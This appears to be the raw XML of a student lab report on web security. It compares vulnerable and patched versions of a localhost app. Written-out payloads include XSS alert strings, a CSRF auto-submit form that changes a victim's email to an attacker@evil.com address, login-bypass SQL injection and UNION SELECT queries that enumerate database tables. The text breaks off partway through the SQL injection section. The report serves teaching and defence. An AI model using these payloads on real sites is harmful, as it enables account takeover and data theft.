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C745" w14:textId="32E3C736" w:rsidR="00240AD0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QUESTION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675E3064" w14:textId="2BF77D63" w:rsidR="00782CA9" w:rsidRDefault="00782CA9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400"/>
        <w:gridCol w:w="2130"/>
        <w:gridCol w:w="2130"/>
      </w:tblGrid>
      <w:tr w:rsidR="00782CA9" w14:paraId="4A3FABFD" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="0B92B944" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="16DA2BD7" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Payload Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="4AD08B2E" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerable Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="3D7846C4" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Safe Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="57CCEE03" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B5DA23" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="667E204B" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>&lt;script&gt;alert('reflected')&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA9C433" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Popup executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED8A207" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Shown as escaped text, no popup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="3FA00589" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD3D283" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="383FDB3C" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>&lt;img src=x onerror=alert('stored-xss')&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04CA5927" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Popup on page load (comment stored in DB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61CAE42A" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Comment shown as plain text, no popup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="47F7B982" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79013048" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>DOM-based XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA6405A" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>#&lt;img src=x onerror=alert(1)&gt; in URL hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DFFA2D3" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Popup via innerHTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4316423B" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Text shown via textContent, no popup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="4AE69508" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05949589" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30394C10" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Hidden auto-submit form to /change-email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2127CA7F" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Email changed to attacker@evil.com silently</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E9024F5" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>ForbiddenError: invalid csrf token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="4C780BB7" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AF03F6F" w14:textId="0AAB2DDE" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>SQL Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBE2B8A" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t xml:space="preserve">' OR '1'='1' -- </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43991909" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Login bypassed (logged in as alice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6362482F" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Invalid credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="7CA39322" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1864C3F7" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346640C0" w14:textId="19F6493F" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Intermediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CED459" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>?id=1 AND 1=1  vs  ?id=1 AND 1=2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06B548EE" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Different responses (User found / No such user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BB89D5" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Invalid id (rejected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00782CA9" w14:paraId="3C6B23BB" w14:textId="77777777" w:rsidTr="00A7679B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6058E7" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A5068C7" w14:textId="7EF1D409" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69D063A5" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>UNION SELECT chain: columns → tables → columns → data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8BAA79" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Full username/password dump leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2130" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B17D59F" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRDefault="00782CA9" w:rsidP="00A7679B">
            <w:r>
              <w:t>Empty result []</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5091FC8E" w14:textId="77777777" w:rsidR="00782CA9" w:rsidRPr="00100002" w:rsidRDefault="00782CA9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F6361F" w14:textId="1616FD82" w:rsid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XSS REFLECTED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DB745D" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>Vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BF199" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00234D75">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42FF049F" wp14:editId="4C611FF4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3DF0" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>Safe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D952BB5" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00234D75">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4513A576" wp14:editId="1DBF8732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7A9F" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002"/>
    <w:p w14:paraId="0B082A10" w14:textId="77777777" w:rsidR="00100002" w:rsidRP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A077F44" w14:textId="6214C85D" w:rsid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XSS STORED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F923117" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerable file after comment there is a pop up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B124B9" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00730C0C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="553A7C02" wp14:editId="7A490444">
            <wp:extent cx="5369432" cy="302260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3372" cy="30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4E49" w14:textId="5E359565" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>Safe file no pop up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0F6A0" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00025255">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00802548" wp14:editId="6446AAED">
            <wp:extent cx="5410200" cy="304092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103" cy="30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2321" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002"/>
    <w:p w14:paraId="525770E0" w14:textId="77777777" w:rsidR="00100002" w:rsidRP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1398FA4" w14:textId="0D2BED11" w:rsid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XSS DOM-BASED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B438A0D" w14:textId="77777777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Vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913DF93" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00234D75">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="477A943E" wp14:editId="4495EB6F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F5DA" w14:textId="77777777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Safe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440871F4" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00234D75">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4675E428" wp14:editId="33BE9C69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6F59" w14:textId="09B25F9C" w:rsid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CSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAEA5F9" w14:textId="77777777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Login.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A224A0D" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;form method="POST" action="http://localhost:3000/login"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407FB3A8" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  &lt;input name="username" value="alice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C1330" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t xml:space="preserve">  &lt;input name="password" value="alice123"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16190C81" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t xml:space="preserve">  &lt;button type="submit"&gt;Login&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A017246" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489D73A" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>1.login as alice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37127FD9" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00025255">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73ED8E6A" wp14:editId="21EFAB0F">
            <wp:extent cx="4756150" cy="2673302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978" cy="26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F03" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>2. csrf attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12B55B" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00D220DB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16871B8F" wp14:editId="424CBAAA">
            <wp:extent cx="4801426" cy="2698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861" cy="270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5A26" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00D220DB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD32493" wp14:editId="022EF09A">
            <wp:extent cx="5943600" cy="18472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2178" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002"/>
    <w:p w14:paraId="4DE7E53D" w14:textId="6A8F1969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csrf-attack-safe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A8770" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427AAEBA" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778DE3A4" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;body onload="document.forms[0].submit()"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19631520" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t xml:space="preserve">  &lt;form action="http://localhost:3001/change-email" method="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E1A8F" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="newEmail" value="attacker2@evil.com"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDA0B0" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA5761" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t xml:space="preserve">  &lt;p&gt;Trying on safe version...&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686FD1A" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECEC656" w14:textId="43A8B89E" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54523DAF" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00D220DB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DD0E536" wp14:editId="1161E409">
            <wp:extent cx="5264622" cy="2959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426" cy="296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4B52" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00D220DB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4F203E" wp14:editId="4C94C7BC">
            <wp:extent cx="5943600" cy="3357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8672" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002"/>
    <w:p w14:paraId="1B0A92CE" w14:textId="77777777" w:rsidR="00100002" w:rsidRP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BC1510B" w14:textId="7F1E06FD" w:rsid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SQL INJECTION EASY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B2FA2" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00B35934">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41EC15CF" wp14:editId="190D6E35">
            <wp:extent cx="5943600" cy="33667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13EC" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>First one is vulnerable and in second check it shows invalid credentials and blocked the attacker request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF0588" w14:textId="77777777" w:rsidR="00100002" w:rsidRP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3E53A82" w14:textId="505A5030" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="0010000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SQL INJECTION </w:t>
      </w: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INTERMEDIATE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9F284" w14:textId="5B26B47E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Vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC256D" w14:textId="6BA5E75E" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:t>ser found when id is matched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424A862" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00A9277A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06895A90" wp14:editId="5E63F8BD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6CA7" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00A9277A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4A4DDE" wp14:editId="099A0402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0D39" w14:textId="76E7223B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SAFE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19372F" w14:textId="7C107BEC" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>User not found on id matched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02251349" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00A9277A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="749889B4" wp14:editId="1AE7BB73">
            <wp:extent cx="5943600" cy="33166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873F" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00A9277A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470EE466" wp14:editId="7B49AEE5">
            <wp:extent cx="5289550" cy="2975372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9635" cy="29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3F21" w14:textId="289DEE7D" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00A94C9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SQL INJECTION </w:t>
      </w:r>
      <w:r w:rsidRPr="00100002">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ADVANCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D00E70" w14:textId="45C6A412" w:rsidR="00A94C9E" w:rsidRPr="00A94C9E" w:rsidRDefault="00A94C9E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v</w:t>
      </w:r>
      <w:r w:rsidR="00100002" w:rsidRPr="00A94C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB610D" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>1.Column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6EBAA" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>localhost:3000/search-user?name=test%27 UNION SELECT NULL,NULL,NULL-- -</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4B54A4" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00B35934">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="746126C8" wp14:editId="4E19AD15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CA61" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002"/>
    <w:p w14:paraId="4932CAEC" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.Database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F97ED" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>localhost:3000/search-user?name=test%27 UNION SELECT table_schema,table_name,NULL FROM information_schema.tables-- -</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519430EB" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00B35934">
        <w:drawing>
